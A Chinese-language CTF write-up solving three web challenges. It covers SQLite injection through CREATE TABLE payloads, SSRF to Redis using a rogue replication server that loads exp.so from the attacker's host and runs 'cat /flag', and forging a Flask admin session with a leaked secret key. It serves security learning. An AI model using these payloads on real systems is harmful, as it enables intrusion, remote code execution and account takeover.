buu web部分wp

[Zer0pts2020]phpNantokaAdmin

下载源码：
index.php

include 'util.php';
include 'config.php';
 
 
error_reporting(0);
session_start();
 
 
$method = (string) ($_SERVER['REQUEST_METHOD'] ?? 'GET');
$page = (string) ($_GET['page'] ?? 'index');
...省略...
 
 
if (in_array($page, ['insert', 'delete']) && !isset($_SESSION['database'])) {
  flash("Please create database first.");
}
 
 
if (isset($_SESSION['database'])) {
  $pdo = new PDO('sqlite:db/' . $_SESSION['database']);
  $stmt = $pdo->query("SELECT name FROM sqlite_master WHERE type='table' AND name <> '" . FLAG_TABLE . "' LIMIT 1;");
  $table_name = $stmt->fetch(PDO::FETCH_ASSOC)['name'];
 
 
  $stmt = $pdo->query("PRAGMA table_info(`{$table_name}`);");
  $column_names = $stmt->fetchAll(PDO::FETCH_ASSOC);
}
 
 
if ($page === 'insert' && $method === 'POST') {
  $values = $_POST['values'];
  $stmt = $pdo->prepare("INSERT INTO `{$table_name}` VALUES (?" . str_repeat(',?', count($column_names) - 1) . ")");
  $stmt->execute($values);
  redirect('?page=index');
}
 
 
if ($page === 'create' && $method === 'POST' && !isset($_SESSION['database'])) {
  if (!isset($_POST['table_name']) || !isset($_POST['columns'])) {
    flash('Parameters missing.');
  }
 
 
  $table_name = (string) $_POST['table_name'];
  $columns = $_POST['columns'];
  $filename = bin2hex(random_bytes(16)) . '.db';
  $pdo = new PDO('sqlite:db/' . $filename);
 
 
  if (!is_valid($table_name)) {
    flash('Table name contains dangerous characters.');
  }
  ...省略...
 
 
  $sql = "CREATE TABLE {$table_name} (";
  $sql .= "dummy1 TEXT, dummy2 TEXT";
  for ($i = 0; $i < count($columns); $i++) {
    $column = (string) ($columns[$i]['name'] ?? '');
    $type = (string) ($columns[$i]['type'] ?? '');
 
 
    if (!is_valid($column) || !is_valid($type)) {
      flash('Column name or type contains dangerous characters.');
    }
    if (strlen($column) < 1 || 32 < strlen($column) || strlen($type) < 1 || 32 < strlen($type)) {
      flash('Column name and type must be 1-32 characters.');
    }
 
 
    $sql .= ', ';
    $sql .= "`$column` $type";
  }
  $sql .= ');';
 
 
  $pdo->query('CREATE TABLE `' . FLAG_TABLE . '` (`' . FLAG_COLUMN . '` TEXT);');
  $pdo->query('INSERT INTO `' . FLAG_TABLE . '` VALUES ("' . FLAG . '");');
  $pdo->query($sql);
 
 
  $_SESSION['database'] = $filename;
  redirect('?page=index');
}
...省略...
if ($page === 'index' && isset($_SESSION['database'])) {
  $stmt = $pdo->query("SELECT * FROM `{$table_name}`;");
 
 
  if ($stmt === FALSE) {
    $_SESSION = array();
    session_destroy();
    redirect('?page=index');
  }
 
 
  $result = $stmt->fetchAll(PDO::FETCH_NUM);
}
?>
<!doctype html>
<html lang="en">
 
 
...省略...
 
 
<?php if ($page === 'index') { ?>
<?php if (isset($_SESSION['database'])) { ?>
    <h2><?= e($table_name) ?> (<a href="?page=delete">Delete table</a>)</h2>
    <form action="?page=insert" method="POST">
      <table>
        <tr>
<?php for ($i = 0; $i < count($column_names); $i++) { ?>
          <th><?= e($column_names[$i]['name']) ?></th>
<?php } ?>
        </tr>
<?php for ($i = 0; $i < count($result); $i++) { ?>
        <tr>
<?php for ($j = 0; $j < count($result[$i]); $j++) { ?>
          <td><?= e($result[$i][$j]) ?></td>
<?php } ?>
        </tr>
<?php } ?>
        <tr>
...省略...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126

util.php

...省略...

 
function is_valid($string) {
  $banword = [
    // comment out, calling function...
    "[\"#'()*,\\/\\\\`-]"
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $string)) {
    return false;
  }
  return true;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

有点像是sql，搜索后知道数据库是sqlite

在使用sqlite语法的时候列名是可以加方括号的，是为了和mysql语法兼容
在使用sqlite_master时使用错误的语法，sqlite将会忽略后面列的名称，无论列的名称是否真实的存在，除非在列之间放置。
在使用sqlite语法时，用该语句create table …as select …创建表时可以不用带括号。

题目中sql语句大概是

CREATE TABLE $table_name (dummy1 TEXT, dummy2 TEXT, `$column` $type);
1

创建表时传入（使用post）

table_name=[aaa] as select [sql][&columns[0][name]=]from sqlite_master;&columns[0][type]=2
1

相当于

$sql = "CREATE TABLE [aaa] as select [sql][ (dummy1 TEXT, dummy2 TEXT, `]from sqlite_master;` 2);";
1

[sql]后面的[(dummy1 TEXT, dummy2 TEXT,]`被忽略，就相当于

create table [aaa] as select sql from sqlite_master
1

得到列名和表名，然后用同样的方法查看flag

table_name=aaa as select flag_2a2d04c3 as[&columns[0][name]=]from flag_bf1811da;&columns[0][type]=2
1

[网鼎杯 2020 玄武组]SSRFMe

打开后代码审计，用?url=http://0.0.0.0/hint.php绕过，往下做发现tm的就会这一步，

拿到redis的密码root，打redis，这一题的考点是在主从复制
先下载两个要用的工具：
https://github.com/xmsec/redis-ssrf
https://github.com/n0b0dyCN/redis-rogue-server
然后redis-rogue-server这个项目只需要把默认的exp.so放在redis-ssrf-master这个项目下
1.小号开linux靶机,ssh连接,把这两个py文件和exp.so传至同一目录下
2.修改ssrf-redis中的三处

elif mode==3:
	lhosr="linux靶机的ip"
	lport="6666"
	command="cat /flag"
1
2
3
4

ip="0.0.0.0"
port="6379"
1
2

3.生成payload,因为还需要在url中传参,会解码一次,所以还需要url编码一次
4.在linux服务器上使用rogue建立从节点
5.将生成的payload打过去
执行 python rogue-server.py
这里容易断开，可以写个死循环shell脚本跑rogue-server.py
test.sh的代码：

while [ "1" = "1" ]
do
	python rogue-server.py
done
1
2
3
4

[FBCTF2019]Event

打开以后是一个登录的网站，不能用admin注册，随便用个别的，登陆后，

在上面输入的内容会记录下来，抓包发现cookie好像不太正常，搜索后发现是进行了jwt加密

查看wp发现存在ssti漏洞，在提交数据的时候，有三个可控参数，经测试在event_important参数存在模版注入，输入__dict__，发现成功回显
接着查找配置文件：class.init.globals[app].config
得到的密钥为fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y
前面知道cookie的加密方式是jwt加密
已知密钥，即可伪造签名
构造exp

from flask import Flask
from flask.sessions import SecureCookieSessionInterface

app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'

session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)

@app.route('/')
def index():
    print(session_serializer.dumps("admin"))

index()
1
2
3
4
5
6
7
8
9
10
11
12
13

得ImFkbWluIg.X3L9vw.Vjo-AqvLZVgpr5ZM6DZ3GaN_zSo
修改cookie后，查看flag